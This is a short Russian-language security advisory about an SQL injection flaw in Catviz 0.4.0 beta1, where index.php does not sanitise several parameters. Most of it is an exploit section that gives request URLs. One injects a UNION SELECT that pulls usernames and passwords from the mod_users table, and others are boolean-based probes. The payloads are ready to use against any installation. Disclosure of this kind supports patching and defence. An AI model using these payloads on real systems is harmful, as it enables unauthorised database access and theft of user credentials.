Программа: Catviz 0.4.0 beta1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных во множественных параметрах сценарием index.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[target]/[path]/index.php?module=news&news_op=form& form_name=article&form_action=show&foreign_key_value=[SQL]
http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL]

index.php?module=news&news_op=form&form_name=article &form_action=show&foreign_key_value=10
union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32 from
mod_users/*

index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1
index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии